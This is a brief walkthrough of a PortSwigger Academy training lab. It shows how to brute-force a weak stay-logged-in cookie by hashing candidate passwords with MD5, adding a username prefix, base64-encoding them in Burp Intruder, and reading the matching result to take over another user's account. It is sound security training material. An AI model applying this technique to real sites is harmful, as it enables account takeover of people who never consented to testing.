PortSwigger Academy Lab: Brute-forcing a stay-logged-in cookie
Task
This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing.
To solve the lab, brute-force Carlos’s cookie to gain access to his My account page.
- Your credentials:
wiener:peter - Victim’s username:
carlos - Candidate passwords
Solution
After logging in with the stay signed in option on, examine stay-logged-in cookie. Decoding the cookie with base64 got wiener:51dc30ddc473d43a6011e9ebba6ca770. I put this into crackstation and it turned out my password peter.
In a request to /my-account?id=wiener, change id=wiener to carlos. Send it to Intruder. Add the stay logged in cookie as a target position. Paste candidate passwords to payload config.
Before proceeding further, make sure to log out and set the latest session token to the request.
Add hash MD5, prefix carlos:, and encode base64-encode to payload processing in this order. The order is quite important here. Add Update email to the grep matching panel in settings. Request 21 got highlighted and now the lab has been solved.
The minor problem is the result only shows the final payload, which is hashed value. In this case, save the password list to .txt file and extract only the line number 21.
sed -n '21p' candidate.lst